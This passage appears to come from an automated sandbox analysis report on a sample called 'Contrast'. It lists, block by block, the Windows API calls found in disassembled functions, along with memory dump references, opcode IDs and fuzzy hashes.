                                                                                                                                        • Associated: 0000000A.00000002.2852315180.0000000000510000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005C6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853227718.00000000005D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853320691.00000000005D9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_10_2_510000_Contrast.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: _memset$CloseCreateHandleProcess
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3277943733-0
                                                                                                                                        • Opcode ID: 618f1881663e72dada0bf5aff91f8fd80f53211c0af458a6ca7224475ba2235a
                                                                                                                                        • Instruction ID: 5a2df37a40561e71c613c0c03c48fbe026cb4ecb9b5ca59139dbe45ac7390859
                                                                                                                                        • Opcode Fuzzy Hash: 618f1881663e72dada0bf5aff91f8fd80f53211c0af458a6ca7224475ba2235a
                                                                                                                                        • Instruction Fuzzy Hash: C0F082B25413067FF7602765AC0AFBB3F9DFB29751F000423BA08D51A2DB755C14A7A8
                                                                                                                                        APIs
                                                                                                                                        • EnterCriticalSection.KERNEL32(?), ref: 005771A1
                                                                                                                                          • Part of subcall function 00577C7F: _memset.LIBCMT ref: 00577CB4
                                                                                                                                        • _memmove.LIBCMT ref: 005771C4
                                                                                                                                        • _memset.LIBCMT ref: 005771D1
                                                                                                                                        • LeaveCriticalSection.KERNEL32(?), ref: 005771E1
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000A.00000002.2852366604.0000000000511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00510000, based on PE: true
                                                                                                                                        • Associated: 0000000A.00000002.2852315180.0000000000510000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005C6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853227718.00000000005D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853320691.00000000005D9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_10_2_510000_Contrast.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CriticalSection_memset$EnterLeave_memmove
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 48991266-0
                                                                                                                                        • Opcode ID: 41baed4f4d6717d257e0858296ec0b56b19a50e4c4dc0785f222e89dda709797
                                                                                                                                        • Instruction ID: 0b182515e47225764c3384b4414417635c72d1d63b11f998476b670df611eb51
                                                                                                                                        • Opcode Fuzzy Hash: 41baed4f4d6717d257e0858296ec0b56b19a50e4c4dc0785f222e89dda709797
                                                                                                                                        • Instruction Fuzzy Hash: 0BF0303A100104ABCF016F55EC8DA4ABF29FF89320F04C051FE085E25AC731E915EBB4
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 005116CF: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00511729
                                                                                                                                          • Part of subcall function 005116CF: SelectObject.GDI32(?,00000000), ref: 00511738
                                                                                                                                          • Part of subcall function 005116CF: BeginPath.GDI32(?), ref: 0051174F
                                                                                                                                          • Part of subcall function 005116CF: SelectObject.GDI32(?,00000000), ref: 00511778
                                                                                                                                        • MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 0059C3E8
                                                                                                                                        • LineTo.GDI32(00000000,?,?), ref: 0059C3F5
                                                                                                                                        • EndPath.GDI32(00000000), ref: 0059C405
                                                                                                                                        • StrokePath.GDI32(00000000), ref: 0059C413
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000A.00000002.2852366604.0000000000511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00510000, based on PE: true
                                                                                                                                        • Associated: 0000000A.00000002.2852315180.0000000000510000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005C6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853227718.00000000005D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853320691.00000000005D9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_10_2_510000_Contrast.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Path$ObjectSelect$BeginCreateLineMoveStroke
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1539411459-0
                                                                                                                                        • Opcode ID: a4e28f6422901ff9d625ae8cc5c7d7c95c4ea9cc8ba915d8479e22d5e6c0bf50
                                                                                                                                        • Instruction ID: 4f076d31ac96ea9231298c7ae9d7b4fbeff8987317f9ab6a2af5903a24445f41
                                                                                                                                        • Opcode Fuzzy Hash: a4e28f6422901ff9d625ae8cc5c7d7c95c4ea9cc8ba915d8479e22d5e6c0bf50
                                                                                                                                        • Instruction Fuzzy Hash: 3FF0BE31005219BADF222F50AC0DFCE3F59BF2A311F048001FA11210E283741659EBA9
                                                                                                                                        APIs
                                                                                                                                        • SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 0056AA6F
                                                                                                                                        • GetWindowThreadProcessId.USER32(?,00000000), ref: 0056AA82
                                                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 0056AA89
                                                                                                                                        • AttachThreadInput.USER32(00000000), ref: 0056AA90
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000A.00000002.2852366604.0000000000511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00510000, based on PE: true
                                                                                                                                        • Associated: 0000000A.00000002.2852315180.0000000000510000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005C6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853227718.00000000005D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853320691.00000000005D9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_10_2_510000_Contrast.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2710830443-0
                                                                                                                                        • Opcode ID: fc7e98d7ba5532037bd25951984227722b0a102f692b62f6f31364435e2ef0d8
                                                                                                                                        • Instruction ID: 390acdb47c511851c58a17c8e258e33126364f45b805f365e3066ffdaa4ab2e2
                                                                                                                                        • Opcode Fuzzy Hash: fc7e98d7ba5532037bd25951984227722b0a102f692b62f6f31364435e2ef0d8
                                                                                                                                        • Instruction Fuzzy Hash: 59E06D31541228BADB215FA2DD0CEEB3F5CFF227A1F008012F50996090C771C554DBE0
                                                                                                                                        APIs
                                                                                                                                        • GetSysColor.USER32(00000008), ref: 0051260D
                                                                                                                                        • SetTextColor.GDI32(?,000000FF), ref: 00512617
                                                                                                                                        • SetBkMode.GDI32(?,00000001), ref: 0051262C
                                                                                                                                        • GetStockObject.GDI32(00000005), ref: 00512634
                                                                                                                                        • GetWindowDC.USER32(?,00000000), ref: 0054C1C4
                                                                                                                                        • GetPixel.GDI32(00000000,00000000,00000000), ref: 0054C1D1
                                                                                                                                        • GetPixel.GDI32(00000000,?,00000000), ref: 0054C1EA
                                                                                                                                        • GetPixel.GDI32(00000000,00000000,?), ref: 0054C203
                                                                                                                                        • GetPixel.GDI32(00000000,?,?), ref: 0054C223
                                                                                                                                        • ReleaseDC.USER32(?,00000000), ref: 0054C22E
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000A.00000002.2852366604.0000000000511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00510000, based on PE: true
                                                                                                                                        • Associated: 0000000A.00000002.2852315180.0000000000510000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005C6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853227718.00000000005D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853320691.00000000005D9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_10_2_510000_Contrast.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Pixel$Color$ModeObjectReleaseStockTextWindow
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1946975507-0
                                                                                                                                        • Opcode ID: 13074587bb303cb09006859c7c3575dedbcbc77cdaea5dbfca2307378e153f5c
                                                                                                                                        • Instruction ID: 15e85019684c43d2a8910baea691cc9c99309a6c13ba326a6b73b8e60dd6e3ce
                                                                                                                                        • Opcode Fuzzy Hash: 13074587bb303cb09006859c7c3575dedbcbc77cdaea5dbfca2307378e153f5c
                                                                                                                                        • Instruction Fuzzy Hash: 90E06531514244BBDB615F64AC097D83F11FB56335F048366FA69480E187714594EB11
                                                                                                                                        APIs
                                                                                                                                        • GetCurrentThread.KERNEL32 ref: 00569339
                                                                                                                                        • OpenThreadToken.ADVAPI32(00000000,?,?,?,00568F04), ref: 00569340
                                                                                                                                        • GetCurrentProcess.KERNEL32(00000028,?,?,?,?,00568F04), ref: 0056934D
                                                                                                                                        • OpenProcessToken.ADVAPI32(00000000,?,?,?,00568F04), ref: 00569354
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000A.00000002.2852366604.0000000000511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00510000, based on PE: true
                                                                                                                                        • Associated: 0000000A.00000002.2852315180.0000000000510000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005C6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853227718.00000000005D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853320691.00000000005D9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_10_2_510000_Contrast.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CurrentOpenProcessThreadToken
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3974789173-0
                                                                                                                                        • Opcode ID: 93581c3b5518137ef403ad1cd0e77fce2e0522f23881f98c730c1829769e31b6
                                                                                                                                        • Instruction ID: cad59c02906ca03e2adde367f75eb049c5868334e574d53c76f0d224ea80e416
                                                                                                                                        • Opcode Fuzzy Hash: 93581c3b5518137ef403ad1cd0e77fce2e0522f23881f98c730c1829769e31b6
                                                                                                                                        • Instruction Fuzzy Hash: ECE08636711311AFD7205FB19D0DB573B6CFF62792F104C18B245CA0D0E634A448D751
                                                                                                                                        APIs
                                                                                                                                        • GetDesktopWindow.USER32 ref: 00550679
                                                                                                                                        • GetDC.USER32(00000000), ref: 00550683
                                                                                                                                        • GetDeviceCaps.GDI32(00000000,0000000C), ref: 005506A3
                                                                                                                                        • ReleaseDC.USER32(?), ref: 005506C4
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000A.00000002.2852366604.0000000000511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00510000, based on PE: true
                                                                                                                                        • Associated: 0000000A.00000002.2852315180.0000000000510000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005C6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853227718.00000000005D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853320691.00000000005D9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_10_2_510000_Contrast.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CapsDesktopDeviceReleaseWindow
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2889604237-0
                                                                                                                                        • Opcode ID: 249d8844032a78a5ec0c7a557b26a85b05130528306ac86c06bd3d9099748335
                                                                                                                                        • Instruction ID: 564149800bd5bc120d6614c78daf5457bcb4ce1281828728277e79f099ec8dc8
                                                                                                                                        • Opcode Fuzzy Hash: 249d8844032a78a5ec0c7a557b26a85b05130528306ac86c06bd3d9099748335
                                                                                                                                        • Instruction Fuzzy Hash: E3E065B0800204EFDF018F60D808A9D7FB1BBAC310F109809F80AA7290CB388095AF10
                                                                                                                                        APIs
                                                                                                                                        • GetDesktopWindow.USER32 ref: 0055068D
                                                                                                                                        • GetDC.USER32(00000000), ref: 00550697
                                                                                                                                        • GetDeviceCaps.GDI32(00000000,0000000C), ref: 005506A3
                                                                                                                                        • ReleaseDC.USER32(?), ref: 005506C4
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000A.00000002.2852366604.0000000000511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00510000, based on PE: true
                                                                                                                                        • Associated: 0000000A.00000002.2852315180.0000000000510000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005C6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853227718.00000000005D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853320691.00000000005D9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_10_2_510000_Contrast.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CapsDesktopDeviceReleaseWindow
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2889604237-0
                                                                                                                                        • Opcode ID: 7e5be500e06fcd9e746308f667422f5af946718917a38ce7f3a0079ded59933d
                                                                                                                                        • Instruction ID: c079d700ef91c4b268fc9639f98316c904fe8a94187af665f897a685953bfdd2
                                                                                                                                        • Opcode Fuzzy Hash: 7e5be500e06fcd9e746308f667422f5af946718917a38ce7f3a0079ded59933d
                                                                                                                                        • Instruction Fuzzy Hash: 80E012B5810204AFDF419FA0D80CA9D7FF1BBAD314F109408F95AA7290DB389596AF50
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 0052436A: _wcscpy.LIBCMT ref: 0052438D
                                                                                                                                          • Part of subcall function 00514D37: __itow.LIBCMT ref: 00514D62
                                                                                                                                          • Part of subcall function 00514D37: __swprintf.LIBCMT ref: 00514DAC
                                                                                                                                        • __wcsnicmp.LIBCMT ref: 0057B670
                                                                                                                                        • WNetUseConnectionW.MPR(00000000,?,?,00000000,?,?,00000100,?), ref: 0057B739
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000A.00000002.2852366604.0000000000511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00510000, based on PE: true
                                                                                                                                        • Associated: 0000000A.00000002.2852315180.0000000000510000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005C6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853227718.00000000005D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853320691.00000000005D9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_10_2_510000_Contrast.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Connection__itow__swprintf__wcsnicmp_wcscpy
                                                                                                                                        • String ID: LPT
                                                                                                                                        • API String ID: 3222508074-1350329615
                                                                                                                                        • Opcode ID: 0e9afae9e5f4d1c4c7a9df8aaa3a0dc26a3d934e2dfd637c1ea4710d44cbf151
                                                                                                                                        • Instruction ID: c60906322b30e4070f9e62493e967afd8dede6b16f9554c2e302653a0c9a1414
                                                                                                                                        • Opcode Fuzzy Hash: 0e9afae9e5f4d1c4c7a9df8aaa3a0dc26a3d934e2dfd637c1ea4710d44cbf151
                                                                                                                                        • Instruction Fuzzy Hash: 51617175A00219AFDB18DF94D885FAEBBB4FF88310F118459F50AAB391D770AE80DB50
                                                                                                                                        APIs
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000A.00000002.2852366604.0000000000511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00510000, based on PE: true
                                                                                                                                        • Associated: 0000000A.00000002.2852315180.0000000000510000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005C6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853227718.00000000005D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853320691.00000000005D9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_10_2_510000_Contrast.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: _memmove
                                                                                                                                        • String ID: #VR
                                                                                                                                        • API String ID: 4104443479-2899241889
                                                                                                                                        • Opcode ID: ee6a1708340765ac8e57d820cb4c8b4fd5e43614d0d818c7c38fd8e9b789931c
                                                                                                                                        • Instruction ID: 57aaa8cecf8e200f3cf6104d5c50b0e5a0cdea34bfa70836378a700c4a930c97
                                                                                                                                        • Opcode Fuzzy Hash: ee6a1708340765ac8e57d820cb4c8b4fd5e43614d0d818c7c38fd8e9b789931c
                                                                                                                                        • Instruction Fuzzy Hash: C4518E70A00619DFDF24CFA8D894AAEBFF1FF45305F24452AE85AD7240E730A959CB91
                                                                                                                                        APIs
                                                                                                                                        • Sleep.KERNEL32(00000000), ref: 0051E01E
                                                                                                                                        • GlobalMemoryStatusEx.KERNEL32(?), ref: 0051E037
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000A.00000002.2852366604.0000000000511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00510000, based on PE: true
                                                                                                                                        • Associated: 0000000A.00000002.2852315180.0000000000510000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005C6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853227718.00000000005D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853320691.00000000005D9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_10_2_510000_Contrast.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: GlobalMemorySleepStatus
                                                                                                                                        • String ID: @
                                                                                                                                        • API String ID: 2783356886-2766056989
                                                                                                                                        • Opcode ID: 79f665091a91ac4895017ac4bfa9fce7a599d4d16c94ded201e9bbf3b9f34298
                                                                                                                                        • Instruction ID: ac6c361336ac110c65804a275e24fedd9a2f6a619193c103abc21cdaee1a3a62
                                                                                                                                        • Opcode Fuzzy Hash: 79f665091a91ac4895017ac4bfa9fce7a599d4d16c94ded201e9bbf3b9f34298
                                                                                                                                        • Instruction Fuzzy Hash: BF5169B14087459BE320AF10E88ABABBBE8FBC5314F81494CF1D941091EB7094A9CB16
                                                                                                                                        APIs
                                                                                                                                        • SendMessageW.USER32(00000027,00001132,00000000,?), ref: 00598186
                                                                                                                                        • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 0059819B
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000A.00000002.2852366604.0000000000511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00510000, based on PE: true
                                                                                                                                        • Associated: 0000000A.00000002.2852315180.0000000000510000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005C6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853227718.00000000005D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853320691.00000000005D9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_10_2_510000_Contrast.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: MessageSend
                                                                                                                                        • String ID: '
                                                                                                                                        • API String ID: 3850602802-1997036262
                                                                                                                                        • Opcode ID: 290ae406d8b4581c6430e3bd898e4793e08c41812ed209bd1f69902b459680e0
                                                                                                                                        • Instruction ID: 06edc15bb55571166e99d88e1dfdc460b00e3bb88b377d4779e80ef63d8739f2
                                                                                                                                        • Opcode Fuzzy Hash: 290ae406d8b4581c6430e3bd898e4793e08c41812ed209bd1f69902b459680e0
                                                                                                                                        • Instruction Fuzzy Hash: B4411975A013099FDF14CF68C885BEA7BB9FB09300F14056AE905EB351DB31A956DF90
                                                                                                                                        APIs
                                                                                                                                        • _memset.LIBCMT ref: 00582C6A
                                                                                                                                        • InternetCrackUrlW.WININET(?,00000000,00000000,0000007C), ref: 00582CA0
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000A.00000002.2852366604.0000000000511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00510000, based on PE: true
                                                                                                                                        • Associated: 0000000A.00000002.2852315180.0000000000510000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005C6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853227718.00000000005D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853320691.00000000005D9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_10_2_510000_Contrast.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CrackInternet_memset
                                                                                                                                        • String ID: |
                                                                                                                                        • API String ID: 1413715105-2343686810
                                                                                                                                        • Opcode ID: 5bd27c0f13f535b27719460c67402b0a7a4e0b12adf3c3472bae3f0406be11af
                                                                                                                                        • Instruction ID: ce0a8d576537748beecae431087b73ed7a645bf3471ef1927e2d06fe86dcc76f
                                                                                                                                        • Opcode Fuzzy Hash: 5bd27c0f13f535b27719460c67402b0a7a4e0b12adf3c3472bae3f0406be11af
                                                                                                                                        • Instruction Fuzzy Hash: 3E313B71C0121AABCF01EFA0DC89AEFBFB9FF55310F100059F815A6266DB315956DBA4
                                                                                                                                        APIs
                                                                                                                                        • DestroyWindow.USER32(?,?,?,?), ref: 0059713C
                                                                                                                                        • MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 00597178
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000A.00000002.2852366604.0000000000511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00510000, based on PE: true
                                                                                                                                        • Associated: 0000000A.00000002.2852315180.0000000000510000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005C6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853227718.00000000005D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853320691.00000000005D9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_10_2_510000_Contrast.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Window$DestroyMove
                                                                                                                                        • String ID: static
                                                                                                                                        • API String ID: 2139405536-2160076837
                                                                                                                                        • Opcode ID: 0e0f1a5e717ee16c359fafb313e95dfb69db81ce962c076c37a6ab967e522924
                                                                                                                                        • Instruction ID: bcc3d7607308608edb70c006f17b580290e0bcf487e6b669b43e87487d39a50e
                                                                                                                                        • Opcode Fuzzy Hash: 0e0f1a5e717ee16c359fafb313e95dfb69db81ce962c076c37a6ab967e522924
                                                                                                                                        • Instruction Fuzzy Hash: 39318F71110609AEEF10DF74DC84AFB7BA9FF88720F10961AF99587191DB31AC91DB60
                                                                                                                                        APIs
                                                                                                                                        • _memset.LIBCMT ref: 005730B8
                                                                                                                                        • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 005730F3
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000A.00000002.2852366604.0000000000511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00510000, based on PE: true
                                                                                                                                        • Associated: 0000000A.00000002.2852315180.0000000000510000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005C6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853227718.00000000005D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853320691.00000000005D9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_10_2_510000_Contrast.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: InfoItemMenu_memset
                                                                                                                                        • String ID: 0
                                                                                                                                        • API String ID: 2223754486-4108050209
                                                                                                                                        • Opcode ID: b1f517478ef9bad1412632b606f7afa90bd88602fae860206fb5e2a22c61bf80
                                                                                                                                        • Instruction ID: ba4a4679a30127b2643b163f7763375360e9a3b32e4700220ae815df6d7706bf
                                                                                                                                        • Opcode Fuzzy Hash: b1f517478ef9bad1412632b606f7afa90bd88602fae860206fb5e2a22c61bf80
                                                                                                                                        • Instruction Fuzzy Hash: 8C31D731A00205DBEB24CF58E889BAEBFB8FF05360F54C019E889A6191D7709B44FB50
                                                                                                                                        APIs
                                                                                                                                        • __snwprintf.LIBCMT ref: 00584132
                                                                                                                                          • Part of subcall function 00521A36: _memmove.LIBCMT ref: 00521A77
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000A.00000002.2852366604.0000000000511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00510000, based on PE: true
                                                                                                                                        • Associated: 0000000A.00000002.2852315180.0000000000510000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005C6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853227718.00000000005D0000.00000004.00000001.01000000.00000007.sdmpDownload File
